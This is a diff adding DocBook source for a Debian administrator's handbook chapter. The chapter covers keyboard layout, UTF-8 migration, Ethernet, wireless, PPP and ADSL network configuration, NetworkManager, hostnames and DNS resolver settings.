+      in console and graphical mode, Debian offers a single
+      configuration interface that works for both: it is based on debconf
+      and is implemented in the <emphasis role="pkg">keyboard-configuration</emphasis> package. Thus the
+      <command>dpkg-reconfigure keyboard-configuration</command> command
+      can be used at any time to reset the keyboard layout.</para>
+
+      <indexterm><primary><emphasis>console-data</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis>console-tools</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis>keyboard-configuration</emphasis></primary></indexterm>
+
+      <para><indexterm><primary><literal>azerty</literal></primary></indexterm>The
+      questions are relevant to the physical keyboard layout (a standard PC
+      keyboard in the US will be a “Generic 104 key”), then the layout
+      to choose (generally “US”), and then the position of the AltGr
+      key (right Alt). Finally comes the question of the key to use for the
+      “Compose key”, which allows for entering special characters by
+      combining keystrokes. Type successively <keycombo action="seq"><keycap>Compose</keycap><keycap>'</keycap><keycap>e</keycap></keycombo>
+      and produce an e-acute (“é”). All these combinations are
+      described in the
+      <filename>/usr/share/X11/locale/en_US.UTF-8/Compose</filename> file
+      (or another file, determined according to the current locale
+      indicated by <filename>/usr/share/X11/locale/compose.dir</filename>).
+      </para>
+      <indexterm><primary><literal>Compose</literal>, key</primary></indexterm>
+      <indexterm><primary><literal>Meta</literal>, key</primary></indexterm>
+      <indexterm><primary>key</primary><secondary><literal>Meta</literal></secondary></indexterm>
+      <indexterm><primary>key</primary><secondary><literal>Compose</literal></secondary></indexterm>
+
+      <para>Note that the keyboard configuration for graphical mode
+      described here only affects the default layout; the GNOME and KDE Plasma
+      environments, among others, provide a keyboard control panel in their
+      preferences allowing each user to have their own configuration. Some
+      additional options regarding the behavior of some particular keys are
+      also available in these control panels.</para>
+
+
+    </section>
+    <section id="sect.utf8-migration">
+      <title>Migrating to UTF-8</title>
+
+      <para>The generalization of UTF-8 encoding has been a long awaited
+      solution to numerous difficulties with interoperability, since it
+      facilitates international exchange and removes the arbitrary limits
+      on characters that can be used in a document. The one drawback is
+      that it had to go through a rather difficult transition phase. Since
+      it could not be completely transparent (that is, it could not happen
+      at the same time all over the world), two conversion operations
+      were required: one on file contents, and the other on filenames.
+      Fortunately, the bulk of this migration has been completed and we
+      discuss it largely for reference.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> <foreignphrase>Mojibake</foreignphrase> and interpretation errors</title>
+
+	<para>When a text is sent (or stored) without encoding information,
+	it is not always possible for the recipient to know with certainty
+	what convention to use for determining the meaning of a set of
+	bytes. You can usually get an idea by getting statistics on the
+	distribution of values present in the text, but that doesn't always
+	give a definite answer. When the encoding system chosen for reading
+	differs from that used in writing the file, the bytes are
+	mis-interpreted, and you get, at best, errors on some characters,
+	or, at worst, something completely illegible.</para>
+
+	<para>Thus, if a French text appears normal with the exception of
+	accented letters and certain symbols which appear to be replaced
+	with sequences of characters like “é” or è” or
+	“ç”, it is probably a file encoded as UTF-8 but interpreted
+	as ISO-8859-1 or ISO-8859-15. This is a sign of a local
+	installation that has not yet been migrated to UTF-8. If, instead,
+	you see question marks instead of accented letters — even if
+	these question marks seem to also replace a character that should
+	have followed the accented letter — it is likely that your
+	installation is already configured for UTF-8 and that you have been
+	sent a document encoded in Western ISO.</para>
+
+	<para>So much for “simple” cases. These cases only appear in
+	Western culture, since Unicode (and UTF-8) was designed to maximize
+	the common points with historical encodings for Western languages
+	based on the Latin alphabet, which allows recognition of parts of
+	the text even when some characters are missing.</para>
+
+	<para>In more complex configurations, which, for example, involve
+	two environments corresponding to two different languages that do
+	not use the same alphabet, you often get completely illegible
+	results — a series of abstract symbols that have nothing to do
+	with each other. This is especially common with Asian languages due
+	to their numerous languages and writing systems. The Japanese word
+	<foreignphrase>mojibake</foreignphrase> has been adopted to
+	describe this phenomenon. When it appears, diagnosis is more
+	complex and the simplest solution is often to simply migrate to
+	UTF-8 on both sides.</para>
+      </sidebar>
+
+      <para>As far as file names are concerned, the migration can be
+      relatively simple. The <command>convmv</command> tool (in the package
+      with the same name) was created specifically for this purpose; it
+      allows renaming files from one encoding to another. The use of this
+      tool is relatively simple, but we recommend doing it in two steps to
+      avoid surprises. The following example illustrates a UTF-8
+      environment containing directory names encoded in ISO-8859-15, and
+      the use of <command>convmv</command> to rename them.</para>
+
+      <screen><computeroutput>$ </computeroutput><userinput>ls travail/</userinput>
+<computeroutput>Ic?nes  ?l?ments graphiques  Textes
+$ </computeroutput><userinput>convmv -r -f iso-8859-15 -t utf-8 travail/</userinput>
+<computeroutput>Starting a dry run without changes...
+mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+No changes to your files done. Use --notest to finally rename the files.
+$ </computeroutput><userinput>convmv -r --notest -f iso-8859-15 -t utf-8 travail/</userinput>
+<computeroutput>mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+Ready!
+$ </computeroutput><userinput>ls travail/</userinput>
+<computeroutput>Éléments graphiques  Icônes  Textes</computeroutput>
+</screen>
+
+      <para>For the file content, conversion procedures are more complex
+      due to the vast variety of existing file formats. Some file formats
+      include encoding information that facilitates the tasks of the
+      software used to treat them; it is sufficient, then, to open these
+      files and re-save them specifying UTF-8 encoding. In other cases, you
+      have to specify the original encoding (ISO-8859-1 or “Western”,
+      or ISO-8859-15 or “Western (Euro)”, according to the
+      formulations) when opening the file.</para>
+
+      <para>For simple text files, you can use <command>recode</command>
+      (in the package of the same name) which allows automatic recoding.
+      This tool has numerous options so you can play with its behavior. We
+      recommend you consult the documentation, the <citerefentry>
+      <refentrytitle>recode</refentrytitle> <manvolnum>1</manvolnum>
+      </citerefentry> man page, or the <citerefentry>
+      <refentrytitle>recode</refentrytitle> </citerefentry> info page (more
+      complete).</para>
+    </section>
+  </section>
+  <section id="sect.network-config">
+    <title>Configuring the Network</title>
+
+    <sidebar id="sidebar.networking-basics">
+      <title><emphasis>BACK TO BASICS</emphasis> Essential network concepts (Ethernet, IP address, subnet, broadcast)</title>
+      <indexterm><primary>Ethernet</primary></indexterm>
+      <indexterm><primary>10BASE-T</primary></indexterm>
+      <indexterm><primary>100BASE-T</primary></indexterm>
+      <indexterm><primary>1000BASE-T</primary></indexterm>
+      <indexterm><primary>10GBASE-T</primary></indexterm>
+      <indexterm><primary>connector, RJ45</primary></indexterm>
+      <indexterm><primary>RJ45 connector</primary></indexterm>
+
+      <para>Most modern local networks use the Ethernet protocol, where
+      data is split into small blocks called frames and transmitted on the
+      wire one frame at a time. Data speeds vary from 10 Mb/s for older
+      Ethernet cards to 10 Gb/s in the newest cards (with the most common
+      rate currently growing from 100 Mb/s to 1 Gb/s). The most widely
+      used cables are called 10BASE-T, 100BASE-T, 1000BASE-T or 10GBASE-T
+      depending on the throughput they can reliably provide (the T stands
+      for “twisted pair”); those cables end in an RJ45 connector. There
+      are other cable types, used mostly for speeds of
+      1 Gb/s and above.</para>
+
+      <indexterm><primary>address, IP address</primary></indexterm>
+      <indexterm><primary>IP address</primary></indexterm>
+
+      <para>An IP address is a number used to identify a network interface
+      on a computer on a local network or the Internet. In the currently
+      most widespread version of IP (IPv4), this number is encoded in 32
+      bits, and is usually represented as 4 numbers separated by periods
+      (e.g. <literal>192.168.0.1</literal>), each number being between 0
+      and 255 (inclusive, which corresponds to 8 bits of data). The next
+      version of the protocol, IPv6, extends this addressing space to 128
+      bits, and the addresses are generally represented as a series of
+      hexadecimal numbers separated by colons (e.g.,
+      2001:0db8:13bb:0002:0000:0000:0000:0020, or 2001:db8:13bb:2::20 for
+      short).</para>
+
+      <indexterm><primary>subnet</primary></indexterm>
+      <indexterm><primary>mask</primary><secondary>subnet mask</secondary></indexterm>
+      <indexterm><primary>network</primary><secondary>address</secondary></indexterm>
+
+      <para>A subnet mask (netmask) defines in its binary code which
+      portion of an IP address corresponds to the network, the remainder
+      specifying the machine. In the example of configuring a static IPv4
+      address given here, the subnet mask, <literal>255.255.255.0</literal>
+      (24 “1”s followed by 8 “0”s in binary representation)
+      indicates that the first 24 bits of the IP address correspond to the
+      network address, and the other 8 are specific to the machine. In
+      IPv6, for readability, only the number of “1”s is expressed; the
+      netmask for an IPv6 network could, thus, be
+      <literal>64</literal>.</para>
+
+      <para>The network address is an IP address in which the part
+      describing the machine's number is 0. The range of IPv4 addresses in
+      a complete network is often indicated by the syntax,
+      <emphasis>a.b.c.d/e</emphasis>, in which <emphasis>a.b.c.d</emphasis>
+      is the network address and <emphasis>e</emphasis> is the number of
+      bits affected to the network part in an IP address. The example
+      network would thus be written: <literal>192.168.0.0/24</literal>. The
+      syntax is similar in IPv6:
+      <literal>2001:db8:13bb:2::/64</literal>.</para>
+
+      <indexterm><primary>router</primary></indexterm>
+      <indexterm><primary>bridge</primary></indexterm>
+
+      <para>A router is a machine that connects several networks to each
+      other. All traffic coming through a router is guided to the correct
+      network. To do this, the router analyzes incoming packets and
+      redirects them according to the IP address of their destination. The
+      router is often known as a gateway; in this configuration, it works
+      as a machine that helps reach out beyond a local network (towards an
+      extended network, such as the Internet).</para>
+
+      <indexterm><primary>broadcast</primary></indexterm>
+
+      <para>The special broadcast address connects all the stations in a
+      network. Almost never “routed”, it only functions on the network
+      in question. Specifically, it means that a data packet addressed to
+      the broadcast never passes through the router.</para>
+
+      <para>This chapter focuses on IPv4 addresses, since they are
+      currently the most commonly used. The details of the IPv6 protocol
+      are approached in <xref linkend="sect.ipv6" />, but the concepts
+      remain the same.</para>
+    </sidebar>
+
+    <para>The network is automatically configured during the initial
+    installation. If Network Manager gets installed (which is generally the case
+    for full desktop installations), then it might be that no configuration
+    is actually required (for example, if you rely on DHCP on a wired
+    connection and have no specific requirements). If a configuration is required
+    (for example for a WiFi interface), then it will create the appropriate
+    file in <filename>/etc/NetworkManager/system-connections/</filename>.</para>
+      
+    <para>If Network Manager is not installed, then the installer
+    will configure <emphasis role="pkg">ifupdown</emphasis> by creating
+    the <filename>/etc/network/interfaces</filename> file. A line starting with
+    <literal>auto</literal> gives a list of interfaces to be automatically
+    configured on boot by the <literal>networking</literal> service.
+    </para>
+
+    <para>
+      In a server context, <emphasis role="pkg">ifupdown</emphasis> is
+      thus the network configuration tool that you usually get. That is why
+      we will cover it in the next sections.
+    </para>
+
+    <indexterm><primary>network</primary><secondary>configuration</secondary></indexterm>
+    <indexterm><primary>configuration</primary><secondary>of the network</secondary></indexterm>
+    <indexterm><primary>interface</primary><secondary>network interface</secondary></indexterm>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> NetworkManager</title>
+      <indexterm><primary><emphasis role="pkg">network-manager</emphasis></primary></indexterm>
+
+      
+      <para>If Network Manager is particularly recommended in roaming setups
+      (see <xref linkend="sect.roaming-network-config" />),
+      it is also perfectly usable as the default network management
+      tool. You can create “System connections” that are used as soon
+      as the computer boots either manually with a
+      <filename>.ini</filename>-like file in
+      <filename>/etc/NetworkManager/system-connections/</filename> or
+      through a graphical tool (<command>nm-connection-editor</command>).
+      Just remember to deactivate all entries in
+      <filename>/etc/network/interfaces</filename> if you want
+      Network Manager to handle them.
+      <ulink type="block" url="https://wiki.gnome.org/Projects/NetworkManager/SystemSettings" />
+      <ulink type="block" url="https://developer.gnome.org/NetworkManager/1.6/ref-settings.html" />
+      </para>
+    </sidebar>
+
+    <section id="sect.interface-ethernet">
+      <title>Ethernet Interface</title>
+
+      <para>If the computer has an Ethernet card, the IP network that is
+      associated with it must be configured by choosing from one of two
+      methods. The simplest method is dynamic configuration with DHCP, and
+      it requires a DHCP server on the local network. It may indicate a
+      desired hostname, corresponding to the <literal>hostname</literal>
+      setting in the example below. The DHCP server then sends
+      configuration settings for the appropriate network.
+      </para>
+
+      <indexterm><primary>Ethernet</primary></indexterm>
+      <indexterm><primary>DHCP</primary></indexterm>
+
+      <example id="example.config-dhcp">
+        <title>DHCP configuration</title>
+
+        <programlisting>
+auto enp0s31f6
+iface enp0s31f6 inet dhcp
+  hostname arrakis
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Names of network interfaces</title>
+        <indexterm><primary><literal>eth0</literal></primary></indexterm>
+        <indexterm><primary><literal>en*</literal></primary></indexterm>
+        <indexterm><primary><literal>wlan0</literal></primary></indexterm>
+        <indexterm><primary><literal>wl*</literal></primary></indexterm>
+        <para>
+          By default, the kernel attributes generic names such a
+          <literal>eth0</literal> (for wired Ethernet) or
+          <literal>wlan0</literal> (for WiFi) to the network interfaces.
+          The number in those names is a simple incremental counter
+          representing the order in which they have been detected.
+          With modern hardware, that order might change for each reboot
+          and thus the default names are not reliable.
+        </para>
+        <para>
+          Fortunately, systemd and udev are able to rename the interfaces
+          as soon as they appear. The default name policy is defined
+          by <filename>/lib/systemd/network/99-default.link</filename>
+          (see
+          <citerefentry><refentrytitle>systemd.link</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+          for an explanation of the <literal>NamePolicy</literal> entry in
+          that file). In practice, the names are often based on the device's
+          physical location (as guessed by where they are connected) and you
+          will see names starting with <literal>en</literal> for wired
+          ethernet and <literal>wl</literal> for WiFi. In the example
+          above, the rest of the name indicates, in abbreviated form, a
+          PCI (<literal>p</literal>) bus number (<literal>0</literal>),
+          a slot number (<literal>s31</literal>), a function number
+          (<literal>f6</literal>).
+        </para>
+        <para>
+          Obviously, you are free to override this policy and/or to
+          complement it to customize the names of some specific
+          interfaces. You can find out the names of the network
+          interfaces in the output of <command>ip addr</command>
+          (or as filenames in <filename>/sys/class/net/</filename>).
+        </para>
+      </sidebar>
+
+      <para>A “static” configuration must indicate network settings in
+      a fixed manner. This includes at least the IP address and subnet
+      mask; network and broadcast addresses are also sometimes listed. A
+      router connecting to the exterior will be specified as a
+      gateway.</para>
+
+      <example id="example.static-network">
+        <title>Static configuration</title>
+
+        <programlisting>
+auto enp0s31f6
+iface enp0s31f6 inet static
+  address 192.168.0.3
+  netmask 255.255.255.0
+  broadcast 192.168.0.255
+  network 192.168.0.0
+  gateway 192.168.0.1
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Multiple addresses</title>
+
+	<para>It is possible not only to associate several interfaces to a
+	single, physical network card, but also several IP addresses to a
+	single interface. Remember also that an IP address may correspond
+	to any number of names via DNS, and that a name may also correspond
+	to any number of numerical IP addresses.</para>
+
+	<para>As you can guess, the configurations can be rather complex,
+	but these options are only used in very special cases. The examples
+	cited here are typical of the usual configurations.</para>
+      </sidebar>
+    </section>
+    <section id="sect.interface-wireless">
+      <title>Wireless Interface</title>
+      <indexterm><primary>wireless</primary></indexterm>
+      <para>
+        Getting wireless network cards to work can be a bit more
+        challenging. First of all, they often require the installation
+        of proprietary firmwares which are not installed by default
+        in Debian. Then wireless networks rely on cryptography to
+        restrict access to authorized users only, this implies
+        storing some secret key in the network configuration.
+        Let's tackle those topics one by one.
+      </para>
+      <section>
+        <title>Installing the required firmwares</title>
+        <indexterm><primary>firmware</primary></indexterm>
+        <indexterm><primary>isenkram</primary></indexterm>
+        <para>
+          First you have to enable the non-free repository
+          in APT's sources.list file: see <xref linkend="sect.apt-sources.list" />
+          for details about this file. Many firmware are proprietary
+          and are thus located in this repository. You can try to
+          skip this step if you want, but if the next step doesn't find the
+          required firmware, retry after having enabled the non-free section.
+        </para>
+        <para>
+          Then you have to install the appropriate
+          <literal>firmware-*</literal> packages. If you don't know which
+          package you need, you can install the <emphasis role="pkg">isenkram</emphasis> package and run its
+          <command>isenkram-autoinstall-firmware</command> command. The
+          packages are often named after the hardware manufacturer or the
+          corresponding kernel module: <emphasis role="pkg">firmware-iwlwifi</emphasis> for Intel wireless
+          cards, <emphasis role="pkg">firmware-atheros</emphasis> for
+          Qualcomm Atheros, <emphasis role="pkg">firmware-ralink</emphasis> for Ralink, etc. A
+          reboot is then recommended because the kernel driver usually
+          looks for the firmware files when it is first loaded and no
+          longer afterwards.
+        </para>
+      </section>
+      <section>
+        <title>Wireless specific entries in <filename>/etc/network/interfaces</filename></title>
+        <indexterm><primary>WPA</primary></indexterm>
+        <para>
+          <emphasis>ifupdown</emphasis> is able to manage wireless
+          interfaces but it needs the help of the <emphasis role="pkg">wpasupplicant</emphasis> package which provides
+          the required integration between <emphasis>ifupdown</emphasis>
+          and the <command>wpa_supplicant</command> command used to configure
+          the wireless interfaces (when using WPA/WPA2 encryption). The
+          usual entry in <filename>/etc/network/interfaces</filename>
+          needs to be extended with two supplementary parameters to specify
+          the name of the wireless network (aka its SSID) and the
+          <emphasis>Pre-Shared Key</emphasis> (PSK).
+        </para>
+        <example id="example.config-wireless">
+          <title>DHCP configuration for a wireless interface</title>
+          <programlisting>
+auto wlp4s0
+iface wlp4s0 inet dhcp
+  wpa-ssid Falcot
+  wpa-psk ccb290fd4fe6b22935cbae31449e050edd02ad44627b16ce0151668f5f53c01b
+</programlisting>
+</example>
+        <para>
+          The <literal>wpa-psk</literal> parameter can contain either the
+          plain text passphrase or its hashed version generated with
+          <command>wpa_passphrase <replaceable>SSID</replaceable>
+            <replaceable>passphrase</replaceable></command>. If you
+          use an unencrypted wireless connection, then you should
+          put a <literal>wpa-key-mgmt NONE</literal> and no
+          <literal>wpa-psk</literal> entry. For more information
+          about the possible configuration options, have a look
+          at <filename>/usr/share/doc/wpasupplicant/README.Debian.gz</filename>.
+        </para>
+        <para>
+          At this point, you should consider restricting the read permissions
+          on <filename>/etc/network/interfaces</filename> to the root user
+          only since the file contains a private key that not all users should
+          have access to.
+        </para>
+        <sidebar>
+          <title><emphasis>HISTORY</emphasis> WEP encryption</title>
+          <indexterm><primary>WEP</primary></indexterm>
+          <para>
+            Usage of the deprecated WEP encryption protocol is possible
+            with the <emphasis role="pkg">wireless-tools</emphasis> package.
+            See <filename>/usr/share/doc/wireless-tools/README.Debian</filename>
+            for instructions.
+          </para>
+        </sidebar>
+      </section>
+    </section>
+    <section id="sect.ppp-rtc">
+      <title>Connecting with PPP through a PSTN Modem</title>
+      <indexterm><primary>PPP</primary></indexterm>
+      <indexterm><primary>point to point</primary></indexterm>
+      <indexterm><primary>connection</primary><secondary>by PSTN modem</secondary></indexterm>
+      <indexterm><primary>modem</primary><secondary>PSTN</secondary></indexterm>
+
+      <para>A point to point (PPP) connection establishes an intermittent
+      connection; this is the most common solution for connections made
+      with a telephone modem (“PSTN modem”, since the connection goes
+      over the public switched telephone network).</para>
+
+      <para>A connection by telephone modem requires an account with an
+      access provider, including a telephone number, username, password,
+      and, sometimes the authentication protocol to be used. Such a
+      connection is configured using the <command>pppconfig</command> tool
+      in the Debian package of the same name. By default, it sets up a
+      connection named <literal>provider</literal> (as in Internet service
+      provider). When in doubt about the authentication
+      protocol, choose <emphasis>PAP</emphasis>: it is offered by the
+      majority of Internet service providers.</para>
+
+      <indexterm><primary><command>pppconfig</command></primary></indexterm>
+      <indexterm><primary>PAP</primary></indexterm>
+
+      <para>After configuration, it is possible to connect using the
+      <command>pon</command> command (giving it the name of the connection
+      as a parameter, when the default value of <literal>provider</literal>
+      is not appropriate). The link is disconnected with the
+      <command>poff</command> command. These two commands can be executed
+      by the root user, or by any other user, provided they are in the
+      <literal>dip</literal> group.</para>
+
+      <indexterm><primary><command>pon</command></primary></indexterm>
+      <indexterm><primary><command>poff</command></primary></indexterm>
+
+    </section>
+    <section id="sect.adsl">
+      <title>Connecting through an ADSL Modem</title>
+      <indexterm><primary>connection</primary><secondary>by ADSL modem</secondary></indexterm>
+      <indexterm><primary>modem</primary><secondary>ADSL</secondary></indexterm>
+      <indexterm><primary>ADSL, modem</primary></indexterm>
+
+      <para>The generic term “ADSL modem” covers a multitude of devices
+      with very different functions. The modems that are simplest to use
+      with Linux are those that have an Ethernet interface (and not only a
+      USB interface). These tend to be popular; most ADSL Internet service
+      providers lend (or lease) a “box” with Ethernet interfaces.
+      Depending on the type of modem, the configuration required can vary
+      widely.</para>
+      <section id="sect.adsl-pppoe">
+        <title>Modems Supporting PPPOE</title>
+        <indexterm><primary>PPPOE</primary></indexterm>
+        <indexterm><primary><command>pppoeconf</command></primary></indexterm>
+
+	<para>Some Ethernet modems work with the PPPOE protocol (Point to
+	Point Protocol over Ethernet). The <command>pppoeconf</command>
+	tool (from the package with the same name) will configure the
+	connection. To do so, it modifies the
+	<filename>/etc/ppp/peers/dsl-provider</filename> file with the
+	settings provided and records the login information in the
+	<filename>/etc/ppp/pap-secrets</filename> and
+	<filename>/etc/ppp/chap-secrets</filename> files. It is recommended
+	to accept all modifications that it proposes.</para>
+
+	<para>Once this configuration is complete, you can open the ADSL
+	connection with the command, <command>pon dsl-provider</command>
+	and disconnect with <command>poff dsl-provider</command>.</para>
+        <indexterm><primary><literal>dsl-provider</literal></primary></indexterm>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> Starting <command>ppp</command> at boot</title>
+          <indexterm><primary><command>systemd</command></primary></indexterm>
+          <indexterm><primary><command>init</command></primary></indexterm>
+
+	  <para>PPP connections over ADSL are, by definition,
+	  intermittent.  Since they are usually not billed according
+	  to time, there are few downsides to the temptation of
+	  keeping them always open.  The standard means to do so is to
+	  use the init system.</para>
+
+          <para>With systemd, adding an automatically
+	  restarting task for the ADSL connection is a simple matter
+	  of creating a “unit file” such as
+          <filename>/etc/systemd/system/adsl-connection.service</filename>,
+          with contents such as the following:
+</para>
+
+<programlisting>[Unit]
+Description=ADSL connection
+
+[Service]
+Type=forking
+ExecStart=/usr/sbin/pppd call dsl-provider
+Restart=always
+
+[Install]
+WantedBy=multi-user.target</programlisting>
+
+          <para>Once this unit file has been defined, it needs to be
+          enabled with <command>systemctl enable
+          adsl-connection</command>.  Then the loop can be started
+          manually with <command>systemctl start
+          adsl-connection</command>; it will also be started
+          automatically on boot.
+          </para>
+
+          <para>On systems not using <command>systemd</command>
+          (including <emphasis role="distribution">Wheezy</emphasis>
+          and earlier versions of Debian), the standard SystemV init
+          works differently.  On such systems, all that is needed is to
+          add a line such as the following at the end of the
+          <filename>/etc/inittab</filename> file; then, any time the
+          connection is disconnected, <command>init</command> will
+          reconnect it.</para>
+
+          <programlisting>
+adsl:2345:respawn:/usr/sbin/pppd call dsl-provider
+</programlisting>
+
+	  <para>For ADSL connections that auto-disconnect on a daily basis, this
+	  method reduces the duration of the interruption.</para>
+        </sidebar>
+      </section>
+      <section id="sect.adsl-pptp">
+        <title>Modems Supporting PPTP</title>
+        <indexterm><primary>PPTP</primary></indexterm>
+
+	<para>The PPTP (Point-to-Point Tunneling Protocol) protocol was
+	created by Microsoft. Deployed at the beginning of ADSL, it was
+	quickly replaced by PPPOE. If this protocol is forced on you, see
+	<xref linkend="sect.pptp" />.</para>
+      </section>
+      <section id="sect.adsl-dhcp">
+        <title>Modems Supporting DHCP</title>
+
+	<para>When a modem is connected to the computer by an Ethernet
+	cable (crossover cable) you typically configure a network
+	connection by DHCP on the computer; the modem automatically acts as
+	a gateway by default and takes care of routing (meaning that it
+	manages the network traffic between the computer and the
+	Internet).</para>
+
+        <sidebar>
+          <title><emphasis>BACK TO BASICS</emphasis> Crossover cable for a direct Ethernet connection</title>
+          <indexterm><primary>crossover cable</primary></indexterm>
+
+	  <para>Computer network cards expect to receive data on specific
+	  wires in the cable, and send their data on others. When you
+	  connect a computer to a local network, you usually connect a
+	  cable (straight or crossover) between the network card and a
+	  repeater or switch. However, if you want to connect two computers
+	  directly (without an intermediary switch or repeater), you must
+	  route the signal sent by one card to the receiving side of the
+	  other card, and vice-versa. This is the purpose of a crossover
+	  cable, and the reason it is used.</para>
+
+          <para>Note that this distinction has become almost
+          irrelevant over time, as modern network cards are able do
+          detect the type of cable present and adapt accordingly, so
+          it won't be unusual that both kinds of cable will work in a
+          given location.</para>
+        </sidebar>
+
+	<para>Most “ADSL routers” on the market can be used like this, as
+	do most of the ADSL modems provided by Internet services
+	providers.</para>
+      </section>
+    </section>
+    <section id="sect.roaming-network-config">
+      <title>Automatic Network Configuration for Roaming Users</title>
+      <indexterm><primary><emphasis role="pkg">network-manager</emphasis></primary></indexterm>
+      <indexterm><primary>network</primary><secondary>roaming configuration</secondary></indexterm>
+
+      <para>Many Falcot engineers have a laptop computer that, for
+      professional purposes, they also use at home. The network
+      configuration to use differs according to location. At home, it may
+      be a wifi network (protected by a WPA key), while the workplace uses
+      a wired network for greater security and more bandwidth.</para>
+
+      <para>To avoid having to manually connect or disconnect the
+      corresponding network interfaces, administrators installed the
+      <emphasis role="pkg">network-manager</emphasis> package on these
+      roaming machines. This software enables a user to easily switch from
+      one network to another using a small icon displayed in the
+      notification area of their graphical desktop. Clicking on this icon
+      displays a list of available networks (both wired and wireless), so
+      they can simply choose the network they wish to use. The program
+      saves the configuration for the networks to which the user has
+      already connected, and automatically switches to the best available
+      network when the current connection drops.</para>
+
+      <para>In order to do this, the program is structured in two parts: a
+      daemon running as root handles activation and configuration of
+      network interfaces and a user interface controls this daemon. PolicyKit
+      handles the required authorizations to control this program and Debian
+      configured PolicyKit in such a way so that members of the netdev
+      group can add or change Network Manager connections.
+      </para>
+
+      <para>Network Manager knows how to handle various types of
+      connections (DHCP, manual configuration, local network), but only if
+      the configuration is set with the program itself. This is why it will
+      systematically ignore all network interfaces in
+      <filename>/etc/network/interfaces</filename> for which it is not
+      suited. Since Network Manager doesn't give details when no network
+      connections are shown, the easy way is to delete from
+      <filename>/etc/network/interfaces</filename> any configuration for
+      all interfaces that must be managed by Network Manager.</para>
+
+      <para>Note that this program is installed by default when the
+      “Desktop Environment” task is chosen during initial
+      installation.</para>
+    </section>
+  </section>
+  <section id="sect.hostname-name-service">
+    <title>Setting the Hostname and Configuring the Name Service</title>
+    <indexterm><primary>name</primary><secondary>attribution and resolution</secondary></indexterm>
+    <indexterm><primary>assignment of names</primary></indexterm>
+
+    <para>The purpose of assigning names to IP numbers is to make them
+    easier for people to remember. In reality, an IP address identifies a
+    network interface associated with a device such as a network card.
+    Since each machine can have several network cards, and several
+    interfaces on each card, one single computer can have several names in
+    the domain name system.</para>
+
+    <para>Each machine is, however, identified by a main (or
+    “canonical”) name, stored in the <filename>/etc/hostname</filename>
+    file and communicated to the Linux kernel by initialization scripts
+    through the <command>hostname</command> command. The current value is
+    available in a virtual filesystem, and you can get it with the
+    <command>cat /proc/sys/kernel/hostname</command> command.</para>
+
+    <indexterm><primary><command>hostname</command></primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> <filename>/proc/</filename> and <filename>/sys/</filename>, virtual filesystems</title>
+      <indexterm><primary><filename>/proc/</filename></primary></indexterm>
+      <indexterm><primary><filename>proc</filename></primary></indexterm>
+      <indexterm><primary><filename>/sys/</filename></primary></indexterm>
+      <indexterm><primary><filename>sys</filename></primary></indexterm>
+
+      <para>The <filename>/proc/</filename> and <filename>/sys/</filename>
+      file trees are generated by “virtual” filesystems. This is a
+      practical means of recovering information from the kernel (by listing
+      virtual files) and communicating them to it (by writing to virtual
+      files).</para>
+
+      <para><filename>/sys/</filename> in particular is designed to provide
+      access to internal kernel objects, especially those representing the
+      various devices in the system. The kernel can, thus, share various
+      pieces of information: the status of each device (for example, if it
+      is in energy saving mode), whether it is a removable device, etc.
+      Note that <filename>/sys/</filename> has only existed since kernel
+      version 2.6.</para>
+    </sidebar>
+
+    <para>Surprisingly, the domain name is not managed in the same way, but
+    comes from the complete name of the machine, acquired through name
+    resolution. You can change it in the <filename>/etc/hosts</filename>
+    file; simply write a complete name for the machine there at the
+    beginning of the list of names associated with the address of the
+    machine, as in the following example:</para>
+    <informalexample>
+      <programlisting>
+127.0.0.1     localhost
+192.168.0.1   arrakis.falcot.com arrakis
+</programlisting>
+    </informalexample>
+    <indexterm><primary><filename>hosts</filename></primary></indexterm>
+    <indexterm><primary><filename>/etc/hosts</filename></primary></indexterm>
+    <indexterm><primary>domain</primary><secondary>name</secondary></indexterm>
+    <indexterm><primary>name</primary><secondary>domain</secondary></indexterm>
+    <indexterm><primary>NSS</primary></indexterm>
+    <section id="sect.name-resolution">
+      <title>Name Resolution</title>
+      <indexterm><primary>resolution</primary><secondary>name</secondary></indexterm>
+      <indexterm><primary>name</primary><secondary>resolution</secondary></indexterm>
+
+      <para>The mechanism for name resolution in Linux is modular and can
+      use various sources of information declared in the
+      <filename>/etc/nsswitch.conf</filename> file. The entry that involves
+      host name resolution is <literal>hosts</literal>. By default, it
+      contains <literal>files dns</literal>, which means that the system
+      consults the <filename>/etc/hosts</filename> file first, then DNS
+      servers. NIS/NIS+ or LDAP servers are other possible sources.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> NSS and DNS</title>
+
+	<para>Be aware that the commands specifically intended to query DNS
+	(especially <command>host</command>) do not use the standard name
+	resolution mechanism (NSS). As a consequence, they do not take into
+	consideration <filename>/etc/nsswitch.conf</filename>, and thus,
+	not <filename>/etc/hosts</filename> either.</para>
+      </sidebar>
+      <section id="sect.dns-server-configuration">
+        <title>Configuring DNS Servers</title>
+        <indexterm><primary>DNS</primary></indexterm>
+        <indexterm><primary>Domain Name Service</primary></indexterm>
+
+	<para>DNS (Domain Name Service) is a distributed and hierarchical
+	service mapping names to IP addresses, and vice-versa.
+	Specifically, it can turn a human-friendly name such as
+	<literal>www.eyrolles.com</literal> into the actual IP address,
+	<literal>213.244.11.247</literal>.</para>
+
+	<para>To access DNS information, a DNS server must be available to
+	relay requests. Falcot Corp has its own, but an individual user is
+	more likely to use the DNS servers provided by their ISP.</para>
+
+        <indexterm><primary><filename>resolv.conf</filename></primary></indexterm>
+        <indexterm><primary><literal>nameserver</literal></primary></indexterm>
+
+	<para>The DNS servers to be used are indicated in the
+	<filename>/etc/resolv.conf</filename>, one per line, with the
+	<literal>nameserver</literal> keyword preceding an IP address, as
+	in the following example:</para>
+
+        <programlisting>
+nameserver 212.27.32.176
+nameserver 212.27.32.177
+nameserver 8.8.8.8
